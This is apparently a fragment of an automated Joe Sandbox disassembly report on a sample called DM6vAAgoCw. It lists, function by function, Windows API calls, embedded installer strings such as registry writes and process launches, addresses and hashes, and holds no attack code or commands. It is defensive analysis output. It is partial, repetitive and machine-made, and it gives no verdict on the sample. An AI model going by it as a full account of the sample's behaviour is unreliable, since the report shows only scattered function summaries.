                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                              • API String ID: 1641139501-220328614
                                                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                              • API String ID: 3734993849-3206598305
                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                              Strings
                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                              • API String ID: 3294113728-3145124454
                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                              Strings
                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                              • `G, xrefs: 0040246E
                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                              • API String ID: 1033533793-4193110038
                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                              • MulDiv.KERNEL32(0002C600,00000064,006F2566), ref: 00403295
                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: f%o$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1305408406
                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004241C1,762323A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004241C1,762323A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                              Strings
                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                              • API String ID: 2014279497-3433828417
                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
Strings
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
APIs
• lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
• wsprintfW.USER32 ref: 00404483
• SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
Strings
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
• DeleteRegKey: "%s\%s", xrefs: 00402843
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Strings
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
APIs
Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcatwsprintf
                                                                                              • String ID: %02x%c$...
                                                                                              • API String ID: 3065427908-1057055748
                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                              • API String ID: 2266616436-4211696005
                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1599320355-0
                                                                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                              APIs
                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
